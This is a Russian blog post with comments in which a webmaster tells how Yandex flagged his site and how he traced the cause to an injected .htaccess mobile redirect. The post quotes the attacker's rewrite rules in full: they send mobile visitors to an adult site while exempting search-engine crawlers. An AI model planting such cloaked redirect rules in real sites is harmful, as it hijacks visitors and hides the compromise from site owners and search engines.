Тема Дня »

Обновил тему WordPress на этом блоге. Старый вариант Arthemii меня устраивал во всем, кроме моральной древности. Функциональность тем значительно увеличилась с 2008 года.
Проблема замены состояла в том, что старая тема на моём блоке постоянно допиливалась в ручную, и перенести все созданное в новую тему было практически невозможно. Но пришлось чем-то жертвовать.
Новая Arthemia была скачена, максимально отстроена и установлена.

Читать полностью »
Партнерский интернет-магазин

Создание, оптимизация и продвижение интернет-магазина.

Создать форум

Как создать “с нуля” и сделать популярным форум. Полезно, интересно и подробно о phpbb3.

WordPress

Рекомендации по настройке и оптимизации WordPress. Плагины, темы, шаблоны.

Дайджест блогосферы

Каждую неделю публикую подборку из пяти наиболее интересных статей.

Конкурсы

Статьи, написанные для участия в различных блоггерских конкурсах.

Главная » Записки вебмастера

Я и Яндекс против вредоносного кода на сайте.

Добавлено на 05.05.2013 – 4:51 пп10 Комментарии

яндекс и вредоносный код

История о том, как Яндекс заблокировал мой сайт за вредоносный код. Как я пытался ситуацию исправить, искал вирусы, а виной всему оказался организованный злоумышленниками мобильный редирект.

Однажды пришло письмо от Яндекса: “На страницах сайта обнаружен вредоносный код”. После этого в выдаче Яндекса сайт стал отображаться с пометкой: “Этот сайт может угрожать безопасности вашего компьютера”. Сами понимаете, что значит для сайта находящегося на первых местах выдачи, такой волчий билет – резкое (практически до нуля) падение посещаемости, а значит и заказов. Проблему нужно было решать, и решать быстро.

Как найти вирус на сайте? В каком из сотен файлов он поселился? С чего в конце-концов начать? Закатал рукава и приступил.

  • Прогнал сайт по нескольким онлайн-сервисам проверяющим на вирусы – ничего.
  • Просмотрел исходный код страниц – вреде всё чисто.
  • Заменил (обновил) используемые java-скрипты.
  • Вернулся на месяц назад, восстановившись из бэкапа.

Яндекс по прежнему сигнализировал о вирусе.

Дело было глухо. Я уже стал грешить на нечестную конкуренцию и вступил в долгую переписку со службой поддержи – мол “сказали А, говорите и Б”. Дайте наводку, что за вирус такой, как он себя проявляет.

И, вот, получаю ответ, который всё проясняет:

Здравствуйте!

При последней проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на другие ресурсы при посещении сайта с мобильных устройств.

Пожалуйста, проверьте данную информацию и удалите код, ответственный за перенаправление. Если вы не размещали этот код самостоятельно, возможно, ваш сайт подвергся взлому.

После устранения проблемы необходимо дождаться автоматической перепроверки сайта, после чего, если не будет обнаружено вредоносное содержимое, пометка в выдаче снимется.

С уважением, Платон Щукин
Служба поддержки Яндекса

Какой-то негодяй поставил на моём сайте мобильный редирект. Переправляет посетителей, зашедших через мобильные устройства на “левый сайт”. Конечно, с компьютера я такой “код” никак не определю.

За редиректы на сайте отвечает, расположенный в корне, файл .htaccess

И в нём, тот самый злодейский код:

RewriteEngine   on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    http://erotraxxx.ru/ads/1    [L,R=302]

Удалил, написал Платону Щукину, и через сутки сайт опять стал получать пользователей, как ни в чём небывало.

P.S. Вычислить подобный код можно и раньше — анализируя статистику (коэффициент отказа) посетителей с мобильных устройств.

P.S. 2. Конечно, поменял все пароли.

GD Star Rating
loading...
Я и Яндекс против вредоносного кода на сайте., 4.7 out of 5 based on 3 ratings

Буду благодарен, если поделитесь этой статьей в социальных сетях:

Метки: ,

10 Комментарии »

  • Странно, что восстановление из бекара не помогло.

    [Ответить]

    Делитант:

    Видимо на момент бэкапа сайт уже был заражён.

    [Ответить]

  • Dominanta:

    У меня вопрос: каким образом код попал в файл .htaccess?

    [Ответить]

    Делитант:

    У меня могут быть только предположения. Скорее всего подобрали пароль от фтп. Но могли взломать и хостера. Были аналогичные случаи. Одни взламывают сайты и это сразу видно. А другие тихонько ставят редирект и собирают деньги. Или распространяют вирусы дальше.

    [Ответить]

  • Кстати, а где смотреть отказы? У меня лирушная статистика, что-то я не нашла там.

    [Ответить]

    Делитант:

    В лиру такой функции нет. Использую Метрику от Яндекса. Если счётчик Лиру, можно отслеживать такие параметры, как «Средняя длительность» и «Просмотров на посетителя». На их резкое снижение (процентов на 30%) стоит обратить внимание.

    [Ответить]

  • В моей практике тоже один раз было нечто подобное. Но мне помог бэкап. И сразу вредоносного кода не стало. Из-за этого даже поменял хостинг: были мелкие недовольства, а после вируса решил окончательно съехать. Антивирусник хостинга этот вирус не мог обнаружить.

    [Ответить]

  • Сегодня столкнулся с этой проблемой. Понервничал не хило. Делал то же самое, но не откатывался, хотелось решить проблему по-другому. Подозрения на htaccess сразу были. Кстати, редиректы точно такие же. Только вот домены вроде другие, но тоже адалт. Любопытная вещь — проверил с iOS устройства (iPhone 6) все отлично работало. А вот андроиды и Windows Phone редиректились причем андроиды редиректились по большей части на страницу где требовали обновить браузер. Пишу этот коммент спустя несколько часов после принятых мер, Яндекс еще не убрал метку. Еще что сделал — залез в логи и посмотрел по какому url было больше всего атак. Бомбили в основном по wp-admin и wp-admin/login.php, поэтому попрятал эти страницы, поставил защитные плагины и естественно везде поменял логины и пароли. Тем, кто столкнулся — не падать духом, доставайте из бэкапа старый htaccess и сравнивайте с новым.

    [Ответить]

Оставить комментарий!

Добавить свой комментарий ниже, или Архив с вашего собственного сайта. Вы также можете Comments Feed через RSS.

Будьте вежливы. Держите его в чистоте. Оставайтесь на тему. Не спам.

Вы можете использовать эти теги:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

Это Gravatar поддержкой сайта. Чтобы получить свой собственный глобально признанных-аватара, пожалуйста, зарегистрируйтесь на Gravatar.